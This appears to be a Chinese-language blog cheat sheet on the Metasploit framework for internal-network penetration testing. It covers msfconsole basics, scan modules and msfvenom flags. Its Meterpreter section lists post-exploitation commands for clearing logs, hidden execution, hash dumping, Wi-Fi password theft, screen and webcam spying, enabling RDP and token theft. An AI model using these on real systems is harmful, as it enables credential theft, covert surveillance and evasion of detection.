内网渗透之msf工具详解

一.文件目录
date目录 存储数据
documentation目录 文档目录
lib目录 存储ruby脚本
modules目录 存储模块和插件
tools目录 存储小工具

二.基础使用
msfdb init 初始化并启动数据库
db_status 查看数据库状态
msfconsole 控制台 (可以使用kage实现界面化)
help 帮助
exit 退出
show 进行罗列模板
search 搜索模块名或cve编号
back 返回上一级
info 查看模块具体信息
show options 查看需要配置的
set 进行设置属性
exploit/run 进行执行
jobs 查看后台执行的工作
kill +id号 停止job

三.收集信息
auxiliary/scanner/discovery/arp_sweep arp扫描
auxiliary/scanner/discovery/udp_sweep udp扫描
auxiliary/scanner/portscan/tcp 端口扫描
还有许多的其他类型的扫描就不再多说了

四.msfvenom
msfvenom -l 查看类型
msfvenom -l payloads 查看所有payload
msfvenom -l archs 查看所有架构
msfvenom -l format 查看所有格式
msfvenom -p 指定payload格式
msfvenom -f 指定输出格式
msfvenom -e 指定编码方式
msfvenom -i 指定编码次数 (注意要小于20)

五.meterpreter
background 返回
sessions -l 查看所有会话信息
sessions -i+id 与指定会话交互
pwd 查看目标当前目录
lpwd 查看本地目录
cd 切换目标的目录
lcd 切换本机的目录
ls 列出目标的文件
lls 列出本机的文件
clearev 清楚痕迹
download 将目标文件下载到本地
upload 将文件上传至目标当前的目录
excute 在目标执行命令的功能(需要参数-H隐藏执行 -f指定进程)
ps 列出目标进程
getuid 查看当前用户用户名
getprivs 查看目标权限
migrate 进行进程迁移
getpid 查看木马进程
shell 进入对方的终端环境(使用 chcp 65001 可以解决乱码)
exit 退出
idletime 查看目标服务器空闲时间
sysinfo 查看目标信息
kill 杀死目标的一个进程
shutdown 关机
reboot 重启
netstat 查看网络连接情况
getsystem 尝试提权
run hashdump 导出目标机密码
run post/windows/wlan/wlan_profile 查看wifi密码
run vnc 实时监控屏幕
run webcam 开启一个摄像头
run post/windows/gather/checkvm 查看目标是否是虚拟机
run post/windows/gather/enum_computers 枚举域内主机
run post/windows/manage/enable_rdp 开启对方的3389端口
load incognito 加载incognito
list_tokens -u 列出可以模拟的令牌
impersonate_token 窃取一个指定的令牌

你可能感兴趣的:(内网渗透,linux)